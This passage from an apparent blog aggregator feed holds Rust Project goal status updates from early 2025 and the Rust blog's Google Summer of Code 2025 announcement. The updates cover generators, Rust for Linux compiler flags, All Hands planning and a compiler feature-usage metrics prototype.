The lang team held two design meetings on generators, with the outcome of the last one being that we will implement a std::iter::iter! macro (exact path TBD) in the compiler, as a lang team experiment that allows the use of the yield syntax. We decided to go in this direction because we want to reserve gen for self-borrowing and perhaps lending generators, and aren't yet decided on which subset of features to expose under that syntax. This decision interacts with ongoing compiler development that isn't ready yet to enable experimentation with lending.

Our hope is that in the meantime, by shipping iter! we will give people the chance to start using generators in their own code and better understand which limitations people hit in practice.

As you may have noticed, I'm not talking about async generators here. Those are the ultimate goal for the async initiative, but we felt the first step should be clarifying the state of synchronous generators so we can build on that when talking about async ones.

dynosaur

dynosaur v0.1.3 was released, with another release in the works. We think we are approaching a 1.0 release real soon now (tm). At this point you should be able to try it on your crate to enable dyn dispatch for traits with async fn and other -> impl Trait methods. If you need to use it together with #[trait_variant], you may need to wait until the next release when #55 is fixed.

Other

The async project goal was accepted for 2025H1!


Why this goal? May 15, 2025 marks the 10-year anniversary of Rust's 1.0 release; it also marks 10 years since the creation of the Rust subteams. At the time there were 6 Rust teams with 24 people in total. There are now 57 teams with 166 people. In-person All Hands meetings are an effective way to help these maintainers get to know one another with high-bandwidth discussions. This year, the Rust project will be coming together for RustWeek 2025, a joint event organized with RustNL. Participating project teams will use the time to share knowledge, make plans, or just get to know one another better. One particular goal for the All Hands is reviewing a draft of the Rust Vision Doc, a document that aims to take stock of where Rust is and lay out high-level goals for the next few years.

What has happened? Planning is proceeding well. In addition to Rust maintainers, we are inviting all project goal owners to attend the All Hands (note that the accompanying RustWeek conference is open to the public, it's just the All Hands portion that is invitation only). There are currently over 100 project members signed up to attend.

For those invited to the All Hands:

  • Travel funds may be available if you are unable to finance travel through your employer. Get in touch for details.
  • Please participate in the brainstorm for how best to use the All Hands time in the all-hands-2025 Zulip stream.
  • If you do plan to attend, please purchase your travel + hotels in a timely fashion as the discount rates will expire.
1 detailed update available.

Comment by @m-ou-se posted on 2025-02-28:

What happened so far:

  • Allocated a budget for the event.
  • Funds have been transferred from the Rust Foundation to RustNL.
  • Booked the venue, including lunch and snacks.
  • Remaining budget from last year's travel grant programme added to this year's, to help cover the travel costs.
  • Announcement published: https://blog.rust-lang.org/inside-rust/2024/09/02/all-hands.html
  • After sending many reminders to teams and individuals, about 110 project members signed up. (And a few cancelled.)
  • Formal invitations sent out to all those who registered.
  • Information on the all-hands: https://rustweek.org/all-hands/
  • Hotel reservations available: https://rustweek.org/hotels-all-hands/
  • Created a public and a private zulip channel.
  • About 65 people confirmed they booked their hotel.
  • Opened up discussion on what to discuss at the all-hands.
  • Invited guests: project goal (task) owners who aren't a project member (12 people in total). 4 of those signed up so far.
  • Acquired 150 secret gifts for the pre-all-hands day.

Next up:

  • Remind folks to get a ticket for the RustWeek conference (tuesday+wednesday) if they want to join that as well.
  • Invite more guests, after deciding on who else to invite. (To be discussed today in the council meeting.)
  • Figure out if we can fund the travel+hotel costs for guests too. (To be discussed today in the council meeting.)
  • Organise all the ideas for topics at the all-hands, so we can turn them into a consistent schedule later.
  • Draft an allocation of the rooms depending on the teams and topics.
  • Open the call for proposals for talks for the Project Track (on wednesday) as part of the RustWeek conference.

Why this goal? This goal continues our work from 2024H2 in supporting the experimental support for Rust development in the Linux kernel. Whereas in 2024H2 we were focused on stabilizing required language features, our focus in 2025H1 is stabilizing compiler flags and tooling options. We will (1) implement RFC #3716 which lays out a design for ABI-modifying flags; (2) take the first step towards stabilizing build-std by creating a stable way to rebuild core with specific compiler options; (3) extending rustdoc, clippy, and the compiler with features that extract metadata for integration into other build systems (in this case, the kernel's build system).

What has happened? We established the precise set of 2025H1 deliverables and we have been tracking them and have begun making progress towards them. Rustdoc has been updated to support extracting doc tests so that the Kernel can execute them in a special environment (this was previously done with a big hack) and RFL is in the process of trying to use that new support. The first PR towards the implementation of RFC #3716 has landed and the ARM team has begun reading early drafts of the design doc for -Zbuild-core with the cargo team.

We are also working to finalize the stabilization of the language features that were developed in 2024H2, as two late-breaking complications arose. The first (an interaction between casting of raw pointers and arbitrary self types) is expected to be resolved by limiting the casts of raw pointers, which previously accepted some surprising code. We identified that only a very small set of crates relied on this bug/misfeature; we expect nonetheless to issue a forwards compatibility warning. We are also resolving an issue where derive(CoercePointee) was found to reveal the existence of some unstable impls in the stdlib.

3 detailed updates availabled.

Comment by @nikomatsakis posted on 2025-01-15:

In our meeting today we reviewed the plans for the 2025H1 project goal...

"Almost done" stuff from before

  • re-stabilize CoercePointee -- Alice is looking at this, it's a good opportunity to try out the new template that is being discussed
  • stabilize arbitrary self types v2 -- @adetaylor left a comment 3 weeks ago indicating that everything was more-or-less landed. RFL is already using it, providing evidence that it works reasonably well. Next steps are then sorting out documentation and moving to stabilize.
  • asm-goto -- ready for stabilization, not been merged yet, still doing some work on the Rust reference (PRs https://github.com/rust-lang/rust/pull/133870, https://github.com/rust-lang/reference/pull/1693)

ABI-modifying flags

The rust-lang/rfcs#3716 is now in Final Comment Period (FCP). There is a preliminary implementation in #133138 that @petrochenkov is going to be reviewing. Some more work will be needed to test, cleanup, etc after that lands.

Other flags from RFL#2

We went through a series of flags from that RFL uses and looking into what might be blocking each of them. The process to stabilize one of these is basically to prepare the stabilization PR (minimal, but we need to rename the flag from -Z to -C) with a stabilization report and proper docs and then cc @davidtwco or @wesleywiser to prepare stabilization. In most cases we need to document how the flags can be misused, most commonly by linking against std or other crates not built with the same flags. If there are major correctness concerns as a result we likely want to consider the flag as "ABI-modifying".

  • ability to extract dependency info, currently using -Zbinary_dep_depinfo=y -- basically ready to stabilize * tmandry: Do you want toolchain runtimes (libstd, compiler-rt) in your dep info? In my experience this features does 90% of what I want it to do, but removing the inclusion of runtimes is the only question I have before stabilizing.
  • -Zcrate-attr, used to configure no-std without requiring it in the source file -- no real concerns
  • -Zunpretty=expanded -- have to clearly document that the output is not stable, much like we did for emitting MIR. This is already "de facto" stable because in practice cargo expand uses RUSTC_BOOTSTRAP=1 and everybody uses it.
  • -Zno-jump-tables -- this should be considered an ABI-modifying flag because we believe it is needed for CFI and therefore there is a risk if incompatible modules are linked.
  • -Zdwarf-version, -Zdebuginfo-compression -- this should be ready to stabilize, so long as we document that you should expect a mix of debuginfo etc when mixing things compiled with different versions (notably libstd, which uses DWARF4). Debuggers are already prepared for this scenario. zstd compression is supported as of Rust 1.82.0.

stable rustdoc features allowing the RFL project to extract and customize rustdoc tests (--extract-doctests)

@imperio authored https://github.com/rust-lang/rust/pull/134531, which is now up for review. Once PR lands, RFL will validate the design, and it can proceed to stabilization.

clippy configuration (possibly .clippy.toml and CLIPPY_CONF_DIR)

We discussed with clippy team, seems like this is not a big deal, mostly a doc change, one concern was whether clippy should accept options it doesn't recognize (because they may come from some future version of clippy). Not a big deal as of now, RFL only uses (msrv, check-private-items=true, disallowed-macros).

rebuild libcore

ARM team is working on this as part of this project goal, expect updates. 🎉

Comment by @nikomatsakis posted on 2025-01-30:

Updates:

2024H2 cleanup

  • Arbitrary self types v2: Stabilization PR is open (rust-lang/rust#135881).
  • Stabilize CoercePointee: RFL is using it now; we are making progress towards completing the stabilization.

2025H1

  • ABI-modifying flags RFC (rust-lang/rfcs#3716) has completed FCP and needs to be merged. Implementation PR #133138 authored by @azhogin remains under review.
  • Other compiler flags, we made a prioritized list. One easy next step would be to rename all -Z flags in this list to something stabilizable (e.g., -C) that requires -Zunstable-features.
    • [ ] -Zdwarf-version -- wesley wiser
    • [ ] -Zdebuginfo-compression, unblocked
    • [ ] -Zcrate-attr, used to configure no-std without requiring it in the source file, no real concerns
    • [ ] -Zunpretty=expanded, unblocked, maybe needs a PR that says "don't rely on this", Linux only uses it for debugging macros (i.e. not in the normal build, so it is less critical). Needs a stable name, e.g., --emit macro-expanded, and we should make sure output cannot be piped to rustc. rustfmt told us (Rust for Linux) that they will try their best to keep rustfmt able to format the output of the expansion.
    • [ ] -Zno-jump-tables, considered an ABI-modifying flag
    • [ ] -Zbinary_dep_depinfo=y -- basically ready to stabilize (@tmandry asked "Do you want toolchain runtimes (libstd, compiler-rt) in your dep info? In my experience this features does 90% of what I want it to do, but removing the inclusion of runtimes is the only question I have before stabilizing", but we don't understand this point yet, as they were not present in the meeting).
  • stable rustdoc: PR rust-lang/rust#134531 is under review, should land soon, then next step will be for RFL folks to try it out.
  • Clippy configuration: no progress, discussed some new options and posted in thread, very minimal work required here.
  • rebuild libcore: @davidtwco wasn't present so no update, but we know progress is being made

Publicizing this work

We discussed briefly how to better get the word out about this collaboration. Some points:

  • @Darksonn will be speaking at Rust Nation
  • We could author a Rust-lang blog post, perhaps once the language items are done done done?
  • LWN article might be an option

general-regs-only

We discussed the possibility of a flag to avoid use of floating point registers, no firm conclusion yet reached.

Comment by @nikomatsakis posted on 2025-02-20:

Updates from our 2025-02-12 meeting:

Given the recent controversy about Rust usage in the Kernel, the RFL group wrote up a policy document explainer to explain the policy, and there was a write-up on LWN.

Regarding arbitary self types and coerce pointee, we are waiting on rust-lang/rust#136764 and rust-lang/rust#136776. The former is on lang team FCP. The latter has received approval from lang team and is awaiting further impl work by @BoxyUwU.

@ojeda is looking into how to manage dependency information and configure no-std externally.

@GuillaumeGomez's impl of rustdoc features has landed and we are waiting on RFL to experiment with it.

@davidtwco's team at ARM has authored a document regarding a blessed way to build-std and are collecting feedback.

@wesleywiser is preparing a PR to add -Zdwarf-version to help advance compiler flags.

There is an annoying issue related to cfg(no_global_oom_handling), which is no longer used by RFL but which remains in an older branch of the kernel (6.12, LTS).

As a set of "leaf crates" that evolve together in a mono-repo-like fashion, RFL would like to have a solution for disabling the orphan rule.


Goals looking for help

Help wanted: this project goal needs a compiler developer to move forward. If you'd like to help, please post in this goal's dedicated zulip topic.

1 detailed update available.

Comment by @epage posted on 2025-02-20:

Help wanted: this project goal needs a compiler developer to move forward.


Help wanted: this project goal needs someone to work on the implementation. If you'd like to help, please post in this goal's dedicated zulip topic.

2 detailed updates availabled.

Comment by @epage posted on 2025-02-20:

Help wanted: this project goal needs someone to work on the implementation

Comment by @ashiskumarnaik posted on 2025-02-23:

Hi @epage I am very interested to collaborate in this implementation work. Let's talk on Zulip, Check DM.


Help wanted: looking for people that want to help do a bit of refactoring. Please reach out through the project-stable-mir zulip channel or repository.

1 detailed update available.

Comment by @celinval posted on 2025-02-25:

No progress yet.

Help Wanted: Looking for people that want to help do a bit of refactoring. Please reach out through the project-stable-mir zulip channel or repository.


Help wanted: this project goal needs a compiler developer to move forward. If you'd like to help, please post in this goal's dedicated zulip topic.

1 detailed update available.

Comment by @epage posted on 2025-02-20:

Help wanted: this project goal needs a compiler developer to move forward.


Other goal updates

1 detailed update available.

Comment by @BoxyUwU posted on 2025-02-27:

camelid has a PR up which is ~fully finished + reviewed which enables resolving and lowering all paths under min_generic_const_args. It's taken a while to get this bit finished as we had to take care not to make parts of the compiler unmaintainable by duplicating all the logic for type and const path lowering.

1 detailed update available.

Comment by @davidtwco posted on 2025-02-19:

An initial update on what we've been up to and some background:

  • This goal is submitted on behalf of the Rust team at Arm, but primarily worked on by @AdamGemmell. Anyone interested can always contact me for updates and I'll keep this issue up-to-date.
  • Our team has been trying to make progress on build-std by completing the issues in rust-lang/wg-cargo-std-aware but found this wasn't especially effective as there wasn't a clearly defined scope or desired outcome for most issues and the relevant teams were lacking in the necessary context to evaluate any proposals.
  • We've since had discussions with the Cargo team and agreed to draft a document describing the use cases, motivations and prior art for build-std such that the Cargo team can feel confident in reviewing any further proposals.
    • @AdamGemmell shared an initial draft of this in #t-cargo on Zulip and it is undergoing further revisions following feedback.
    • Following reaching a shared understanding of the context of the feature, @AdamGemmell will then draft a complete proposal for build-std that could feasibly be stabilised. It will describe the use cases which are and are not considered in-scope for build-std, and which will feature in an initial implementation.
  • @davidtwco is ensuring that whatever mechanism that is eventually proposed to enable build-std to work on stable toolchains will also be suitable for the Rust for Linux project to use when building core themselves.
1 detailed update available.

Comment by @obi1kenobi posted on 2025-02-19:

Thanks, Niko! Copying in the new tasks from the 2025h1 period:

  • [ ] Prototype cross-crate linting using workarounds (@obi1kenobi)
  • [ ] Allow linting generic types, lifetimes, bounds (@obi1kenobi)
  • [ ] Handle "special cases" like 'static and ?Sized (@obi1kenobi)
  • [ ] Handle #[doc(hidden)] in sealed trait analysis (@obi1kenobi)
  • [x] Discussion and moral support (cargo, [rustdoc]
No detailed updates available.
1 detailed update available.

Comment by @tmandry posted on 2025-02-26:

We had a lang team design meeting about C++ interop today. The outcome was very positive, with enthusiasm for supporting an ambitious vision of C++ interop: One where a large majority of real-world C++ code can have automated bindings to Rust and vice-versa.

At the same time, the team expressed a desire to do so in a way that remains in line with Rust's values. In particular, we would not make Rust a superset of Rust+C++, but instead would define extension points that can be used to express language interop boundaries that go beyond what Rust itself allows. As an example, we could allow template instantiation via a Rust "plugin" without adding templates to Rust itself. Similarly, we could allow calling overloaded C++ methods without adding function overloading to Rust itself. Other interop needs are more natural to enable with features in the Rust language, like custom reference types.

In either case, anything we do to support interop will need to be considered on its merits. Interop is a reason to support a feature, but it is never a "blank check" to add anything we might consider useful.

The discussion so far has been at a high level. Next steps will be:

  • Discuss what significant-but-realistic milestones we might pursue as part of upcoming project goals, and what it would take to make them happen. Whether this happens as part of another lang team meeting or a more dedicated kickoff meeting for interested parties, I'll be sure to keep the lang team in the loop and will continue posting updates here.
  • Dive into more specific proposals for use cases we would like to enable in meetings with the language, library, and compiler teams.

Notes: https://hackmd.io/2Ar_7CNoRkeXk1AARyOL7A?view

1 detailed update available.

Comment by @spastorino posted on 2025-02-26:

There's a PR up https://github.com/rust-lang/rust/pull/134797 which implements the proposed RFC without the optimizations. The PR is not yet merged and we need to continue now working on addressing comments to the PR until is merged and then start implementing optimizations.

1 detailed update available.

Comment by @ZuseZ4 posted on 2025-01-03:

Happy New Year everyone! After a few more rounds of feedback, the next autodiff PR recently got merged: https://github.com/rust-lang/rust/pull/130060 With that, I only have one last PR open to have a fully working autodiff MVP upstream. A few features had to be removed during upstreaming to simplify the reviewing process, but they should be easier to bring back as single PRs.

Beginning next week, I will also work on an MVP for the batching feature of LLVM/Enzyme, which enables some AoS and SoA vectorization. It mostly re-uses the existing autodiff infrastructure, so I expect the PRs for it to be much smaller.

On the GPU side, there has been a recent push by another developer to add a new AMD GPU target to the Rust compiler. This is something that I would have needed for the llvm offload project anyway, so I'm very happy to see movement here: https://github.com/rust-lang/compiler-team/issues/823

1 detailed update available.

Comment by @Eh2406 posted on 2025-02-26:

The major update so far is the release of PubGrub 0.3. This makes available the critical improvements made to allow the functionality and performance demanded by Cargo and UV. The other production users can now take advantage of the past few years of improvements. Big thanks to @konstin for making the release happen.

Other progress is been stymied by being sick with Covid for a week in January and the resulting brain fog, followed by several high-priority projects for $DAY_JOB. It is unclear when the demands of work will allow me to return focus to this project.

1 detailed update available.

Comment by @m-ou-se posted on 2025-02-28:

Now that https://github.com/rust-lang/rust/pull/135726 is merged, @jdonszelmann and I will be working on implementing EII.

We have the design for the implementation worked out on our whiteboard. We don't expect any significant blockers at this point. We'll know more once we start writing the code next week.

1 detailed update available.

Comment by @epage posted on 2025-02-20:

This is on pause until the implementation for #92 is finished. The rustc side of #92 is under review and then some additional r-a and cargo work before implementation is done and its waiting on testing and stabilization.

1 detailed update available.

Comment by @jhpratt posted on 2025-02-26:

First status update:

No progress. I will be reviewing the existing PR this weekend to see the feasibility of rebasing it versus reapplying patches by hand. My suspicion is that the latter will be preferable.

1 detailed update available.

Comment by @traviscross posted on 2025-02-26:

This is, I believe, mostly waiting on us on the lang team to have a look, probably in a design meeting, to feel out what's in the realm of possibility for us to accept.

1 detailed update available.

Comment by @celinval posted on 2025-01-03:

Key developments: We have written and verified around 220 safety contracts in the verify-rust-std fork. 3 out of 14 challenges have been solved. We have successfully integrated Kani in the repository CI, and we are working on the integration of 2 other verification tools: VeriFast and Goto-transcoder (ESBMC)

2 detailed updates availabled.

Comment by @jieyouxu posted on 2025-02-19:

Update (2025-02-19):

  • To make it easier to follow bootstrap's test flow going into running compiletest-managed test suites, I've added more tracing to bootstrap in https://github.com/rust-lang/rust/pull/137080.
  • There are some prerequisite cleanups/improvements that I'm working on first to make it easier to read bootstrap + compiletest's codebase for reference: https://github.com/rust-lang/rust/pull/137224, https://github.com/rust-lang/rust/pull/136474, https://github.com/rust-lang/rust/pull/136542
  • I'm thinking for the prototype I'm going to experiment with a branch off of rust-lang/rust instead of completely separately, so I can experiment under the context of bootstrap and tests that we actually have, instead of trying to experiment with it in a complete vacuum (esp. with respect to staging and dependency licenses).

Comment by @jieyouxu posted on 2025-02-27:

Update (2025-02-27):

  • Cleanups still waiting to be merged (some PRs are blocked on changes from others making this slow).
2 detailed updates availabled.

Comment by @yaahc posted on 2025-02-25:

I'm very excited to see that this got accepted as a project goal 🥰 🎉

Let me go ahead and start by giving an initial status update of where I'm at right now.

  • We've already landed the initial implementation for configuring the directory where metrics should be stored which also acts as the enable flag for a default set of metrics, right now that includes ICE reports and unstable feature usage metrics
  • Implemented basic unstable feature usage metrics, which currently dumps a json file per crate that is compiled showing which metrics are enabled. (example below)
  • Implemented rust-lang/rust/src/tools/features-status-dump which dumps the status information for all unstable, stable, and removed features as a json file
  • setup an extremely minimal initial Proof of Concept implementation locally on my laptop using InfluxDB 3.0 Alpha and Graphana (image below)
    • I have a small program I wrote that converts the json files into influxdb's line protocol for both the usage info and the status info (snippets shown below)
      • The timestamps are made up, since they all need to be distinct or else influxdb will treat them all as updates to the same row, I'd like to preserve this information from when the metrics were originally dumped, either in the json or by changing rustc to dump via influxdb's line format directly, or some equivalent protocol. (note this is probably only necessary for the usage metrics, but for the status metrics I'd have to change the line format schema from the example below to avoid the same problem, this has to do with how influxdb treats tags vs fields)
    • I gathered a minimal dataset by compiling rustc with RUSTFLAGS_NOT_BOOTSTRAP="-Zmetrics-dir=$HOME/tmp/metrics" ./x build --stage 2 and ./x run src/tools/features-status-dump/, save the output to the filesystem, and convert the output to the line protocol with the aforementioned program
    • Write the two resulting files to influxdb
    • I then setup the table two different ways, once by directly querying the database using influxdb's cli (query shown below), then again by trying to setup an equivalent query in graphana (there's definitely some kinks to work out here, I'm not an expert on graphana by any means.)

from unstable_feature_usage_metrics-rustc_hir-3bc1eef297abaa83.json

{"lib_features":[{"symbol":"variant_count"}],"lang_features":[{"symbol":"associated_type_defaults","since":null},{"symbol":"closure_track_caller","since":null},{"symbol":"let_chains","since":null},{"symbol":"never_type","since":null},{"symbol":"rustc_attrs","since":null}]}

Image

Snippet of unstable feature usage metrics post conversion to line protocol

featureUsage,crateID="bc8fb5c22ba7eba3" feature="let_chains" 1739997597429030911
featureUsage,crateID="439ccecea0122a52" feature="assert_matches" 1739997597429867374
featureUsage,crateID="439ccecea0122a52" feature="extract_if" 1739997597429870052
featureUsage,crateID="439ccecea0122a52" feature="iter_intersperse" 1739997597429870855
featureUsage,crateID="439ccecea0122a52" feature="box_patterns" 1739997597429871639

Snippet of feature status metrics post conversion to line protocol

featureStatus,kind=lang status="unstable",since="1.5.0",has_gate_test=false,file="/home/jlusby/git/rust-lang/rust/compiler/rustc_feature/src/unstable.rs",line=228,name="omit_gdb_pretty_printer_section" 1739478396884006508
featureStatus,kind=lang status="accepted",since="1.83.0",has_gate_test=false,tracking_issue="123742",file="/home/jlusby/git/rust-lang/rust/compiler/rustc_feature/src/accepted.rs",line=197,name="expr_fragment_specifier_2024" 1739478396884040564
featureStatus,kind=lang status="accepted",since="1.0.0",has_gate_test=false,file="/home/jlusby/git/rust-lang/rust/compiler/rustc_feature/src/accepted.rs",line=72,name="associated_types" 1739478396884042777
featureStatus,kind=lang status="unstable",since="1.79.0",has_gate_test=false,tracking_issue="123646",file="/home/jlusby/git/rust-lang/rust/compiler/rustc_feature/src/unstable.rs",line=232,name="pattern_types" 1739478396884043914
featureStatus,kind=lang status="accepted",since="1.27.0",has_gate_test=false,tracking_issue="48848",file="/home/jlusby/git/rust-lang/rust/compiler/rustc_feature/src/accepted.rs",line=223,name="generic_param_attrs" 1739478396884045054
featureStatus,kind=lang status="removed",since="1.81.0",has_gate_test=false,tracking_issue="83788",file="/home/jlusby/git/rust-lang/rust/compiler/rustc_feature/src/removed.rs",line=245,name="wasm_abi" 1739478396884046179

Run with influxdb3 query --database=unstable-feature-metrics --file query.sql

SELECT
  COUNT(*) TotalCount, "featureStatus".name
FROM
  "featureStatus"
INNER JOIN "featureUsage" ON
  "featureUsage".feature = "featureStatus".name
GROUP BY
  "featureStatus".name
ORDER BY
    TotalCount DESC

Comment by @yaahc posted on 2025-02-25:

My next step is to revisit the output format, currently a direct json serialization of the data as it is represented internally within the compiler. This is already proven to be inadequate by personal experience, given the need for additional ad-hoc conversion into another format with faked timestamp data that wasn't present in the original dump, and by conversation with @badboy (Jan-Erik), where he recommended we explicitly avoid ad-hoc definitions of telemetry schemas which can lead to difficult to manage chaos.

I'm currently evaluating what options are available to me, such as a custom system built around influxdb's line format, or opentelemetry's metrics API.

Either way I want to use firefox's telemetry system as inspiration / a basis for requirements when evaluating the output format options

Relevant notes from my conversation w/ Jan-Erik

  • firefox telemetry starts w/ the question, what is it we want to answer by collecting this data? has to be explicitly noted by whoever added new telemetry, there's a whole process around adding new telemetry
    • defining metric
    • description
    • owner
    • term limit (expires automatically, needs manual extension)
    • data stewards
      • do data review
      • checks that telemetry makes sense
      • check that everything adheres to standards
    • can have downside of increasing overhead to add metrics
    • helps w/ tooling, we can show all this info as documentation
    • schema is generated from definitions
1 detailed update available.

Comment by @nikomatsakis posted on 2025-02-26:

I have established some regular "office hour" time slots where I am available on jitsi. We landed a few minor PRs and improvements to the parser and oli-obk and tif have been working on modeling of effects for the const generics work. I'm planning to start digging more into the modeling of coherence now that the basic merging is done.

1 detailed update available.

Comment by @lcnr posted on 2025-02-27:

We've stabilized -Znext-solver=coherence in version 1.84 and started to track the remaining issues in a project board.

Fixing the opaque types issue breaking wg-grammar is difficult and requires a more in-depth change for which there is now an accepted Types MCP. This likely also unblocks the TAIT stabilization using the old solver.

While waiting on the MCP I've started to look into the errors when compiling nalgebra. @lqd minimized the failures. They have been caused by insufficiencies in our cycle handling. With https://github.com/rust-lang/rust/pull/136824 and https://github.com/rust-lang/rust/pull/137314 cycles should now be fully supported.

We also fully triaged all UI tests with the new solver enabled with @compiler-errors, @BoxyUwU, and myself fixing multiple less involved issues.

1 detailed update available.

Comment by @veluca93 posted on 2025-02-25:

Key developments: Further discussions on implementation details of the three major proposed ways forward. Requested a design meeting in https://github.com/rust-lang/lang-team/issues/309.

1 detailed update available.

Comment by @1c3t3a posted on 2025-02-19:

Status update: The null-checks landed in rust#134424. Next up are the enum discriminant checks.

1 detailed update available.

Comment by @blyxyas posted on 2025-02-26:

As a monthly update (previously posted on Zulip): We have some big progress!

  • rust-clippy#13821 has been open and is currently being reviewed. It moves the MSRV logic out of lint-individualistic attribute extraction and into Clippy-wide MSRV (with a very good optimization, taking into account that only a small percentage of crates use.

  • A Clippy-exclusive benchmarker has arrived, powered by the existing lintcheck infrastructure and perf. So it's compatible with flamegraph and other such tools. rust-clippy#14194 We can later expand this into CI or a dedicated bot.

  • As you probably know, rust#125116 has been merged, just as a reminder of how that big goal was slayed like a dragon :dragon:.

We now know what functions to optimize (or, at least have a basic knowledge of where Clippy spends its time). As some future functionality, I'd love to have a functionality to build cargo and rust with debug symbols and hook it up to Clippy, but that may be harder. It's not perfect, but it's a good start!

clippy benchmark perf.data report

No detailed updates available.
No detailed updates available.
1 detailed update available.

Comment by @JoelMarcey posted on 2025-02-24:

Last week at the Safety Critical Rust Consortium meeting in London, Ferrous systems publicly announced to consortium members that they have committed to contributing the FLS to the Rust Project. We are finalizing the details of that process, but we can start FLS integration testing in parallel, in anticipation.

2 detailed updates availabled.

Comment by @m-ou-se posted on 2025-02-28:

We started the collaboration with the Delft University of Technology. We assembled a small research team with a professor and a MSc student who will be working on this as part of his MSc thesis. We meet weekly in person.

The project kicked off two weeks ago and is now in the literature research phase.

Comment by @m-ou-se posted on 2025-02-28:

And related to this, someone else is working on an implementation of my #[export] rfc: https://github.com/rust-lang/rust/pull/134767 This will hopefully provide meaningful input for the research project.

1 detailed update available.

Comment by @nikomatsakis posted on 2025-02-19:

Update: We are running behind schedule, but we are up and running nonetheless! Bear with us. The goals RFC finished FCP on Feb 18. The new project goals team has been approved and we've updated the tracking issues for the new milestone.

Project goal owners are encouraged to update the issue body to reflect the actual tasks as they go with github checkboxes or other notation as described here. We're going to start pinging for our first status update soon!

1 detailed update available.

Comment by @nikomatsakis posted on 2025-02-19:

Update so far: I put out a call for volunteers on Zulip (hackmd) and a number of folks responded. We had an initial meeting on Jan 30 (notes here). We have created a Zulip stream for this project goal (vision-doc-2025) and I also did some experimenting in the https://github.com/nikomatsakis/farsight repository for what the table of contents might look like.

Next milestone is to layout a plan. We are somewhat behind schedule but not impossibly so!

Believe!

1 detailed update available.

Comment by @davidtwco posted on 2025-02-19:

An initial update on what we've been up to and some background:

  • This goal is submitted on behalf of the Rust team at Arm, but primarily worked on by @Jamesbarford. Anyone interested can always contact me for updates and I'll keep this issue up-to-date.
  • We've scheduled a regular call with @Kobzol to discuss the constraints and requirements of any changes to rust-perf (see the t-infra calendar) and have drafted a document describing a proposed high-level architecture for the service following our changes.
    • This has been shared in the #project-goals/2025h1/rustc-perf-improvements Zulip channel to collect feedback.
    • Once we've reached an agreement on the high-level architecture, we'll prepare a more detailed plan with details like proposed changes to the database schema, before proceeding with the implementation.
1 detailed update available.

Comment by @lqd posted on 2025-01-31:

Key developments from this month:

  • @amandasystems has continued working on the Sisyphean https://github.com/rust-lang/rust/pull/130227 and has made progress on rewriting type tests, diagnostics issues, fixing bugs, kept up with changes on master, and more.
  • big thanks to @jackh726 and @matthewjasper on reviews: with their help, all the PRs from the previous update have landed on nightly.
  • I've opened a couple of PRs on the analysis itself (https://github.com/rust-lang/rust/pull/135290, https://github.com/rust-lang/rust/pull/136299) as well as a few cleanups. With these, there are only around 4 failing tests that still need investigation, and 8-10 diagnostics differences to iron out. This is my current focus, but we'll also need to expand test coverage.
  • I've also opened a handful of PRs gradually expanding the polonius MIR dump with visualizations. I'll next add the interactive "tool" I've been using to help debug the test failures.
  • on organization and collaboration:
    • we've met with one of Amanda's students for a possible Master's thesis on the more engineer-y side of polonius (perf <3)
    • and have also discussed, with @ralfjung's team, the related topic of modeling the borrowck in a-mir-formality
No detailed updates available.
1 detailed update available.

Comment by @davidtwco posted on 2025-02-19:

An initial update on what we've been up to and some background:

  • This goal is submitted on behalf of the Rust team at Arm, but primarily worked on by myself (@davidtwco) and @JamieCunliffe. Anyone interested can always contact me for updates and I'll keep this issue up-to-date.
  • @JamieCunliffe been working on supporting Arm's scalable vector extension (SVE) for a couple years - primarily in rust-lang/rfcs#3268 and its implementation rust-lang/rust#118917.
    • Through this work, we've discovered other changes to the language necessary to be able to support these types without special cases in the type system, which we're also working on (see below).
    • Jamie is still resolving feedback on this RFC and its implementation, and keeping it rebased. We hope that it can be landed experimentally now that there's a feasible path to remove the special cases in the type system (see below).
    • The next steps for this RFC and implementation are..
      • ..to continue to respond to feedback on the RFC and implementation.
  • I've (@davidtwco) been working on rust-lang/rfcs#3729 which improves Rust's support for exotically sized types, and would allow scalable vectors to be represented in the type system without special cases.
    • We've had two design meetings with the language team about the RFC and had a broadly positive reception.
      • There is a non-strict dependency on const traits (rust-lang/rfcs#3762) which has created uncertainty as to whether this RFC could be accepted without the specifics of const traits being nailed down.
    • I've been working on implementing the RFC: an initial implementation of the non-const traits has been completed and adding the const traits is in-progress.
      • The language team have indicated interest in seeing this land experimentally, but this will depend on whether the implementors of const traits are okay with this, as it would add to the work they need to do to make any syntactic changes requested by the language team in rust-lang/rfcs#3762.
    • I'm continuing to respond to feedback on the RFC, but as this has largely trailed off, the next steps for this RFC are..
      • ..for the language team to decide to accept, reject, or request further changes to the RFC.
      • ..for progress on the implementation to continue.
1 detailed update available.

Comment by @jswrenn posted on 2025-02-26:

Key developments: In a Feb 19 Lang Team Design Meeting, we reached consensus that the MVP for unsafe fields should be limited to additive invariants.

No detailed updates available.

The Rust Programming Language BlogRust participates in Google Summer of Code 2025

We are happy to announce that the Rust Project will again be participating in Google Summer of Code (GSoC) 2025, same as last year. If you're not eligible or interested in participating in GSoC, then most of this post likely isn't relevant to you; if you are, this should contain some useful information and links.

Google Summer of Code (GSoC) is an annual global program organized by Google that aims to bring new contributors to the world of open-source. The program pairs organizations (such as the Rust Project) with contributors (usually students), with the goal of helping the participants make meaningful open-source contributions under the guidance of experienced mentors.

The organizations that have been accepted into the program have been announced by Google. The GSoC applicants now have several weeks to discuss project ideas with mentors. Later, they will send project proposals for the projects that they found the most interesting. If their project proposal is accepted, they will embark on a several month journey during which they will try to complete their proposed project under the guidance of an assigned mentor.

We have prepared a list of project ideas that can serve as inspiration for potential GSoC contributors that would like to send a project proposal to the Rust organization. However, applicants can also come up with their own project ideas. You can discuss project ideas or try to find mentors in the #gsoc Zulip stream. We have also prepared a proposal guide that should help you with preparing your project proposals.

You can start discussing the project ideas with Rust Project mentors and maintainers immediately, but you might want to keep the following important dates in mind:

  • The project proposal application period starts on March 24, 2025. From that date you can submit project proposals into the GSoC dashboard.
  • The project proposal application period ends on April 8, 2025 at 18:00 UTC. Take note of that deadline, as there will be no extensions!

If you are interested in contributing to the Rust Project, we encourage you to check out our project idea list and send us a GSoC project proposal! Of course, you are also free to discuss these projects and/or try to move them forward even if you do not intend to (or cannot) participate in GSoC. We welcome all contributors to Rust, as there is always enough work to do.

Last year was our first time participating in GSoC, and it was a success! This year we are very excited to participate again. We hope that participants in the program can improve their skills, but also would love for this to bring new contributors to the Project and increase the awareness of Rust in general. Like last year, we expect to publish blog posts in the future with updates about our participation in the program.

Don Martitwo open source stories

